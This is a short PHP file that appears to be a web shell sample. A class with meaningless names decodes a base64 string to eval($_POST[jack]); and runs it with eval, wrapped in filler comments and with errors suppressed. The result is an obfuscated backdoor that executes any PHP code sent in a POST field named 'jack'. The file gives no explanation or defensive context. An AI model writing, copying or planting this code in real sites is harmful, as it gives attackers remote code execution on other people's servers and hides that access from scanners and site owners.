<?php
//post jack
class WJRH{
    public $HDRIB = null;
    public $PUQIYJ = null;
    function __construct(){
        $this->HDRIB='ZXZhbCgkX1BPU1RbamFja10pOw==';
        $this->PUQIYJ = @base64_decode( $this->HDRIB );
        @eval("/*x|!p~?h*/".$this->PUQIYJ."/*x|!p~?h*/");
    }}
new WJRH();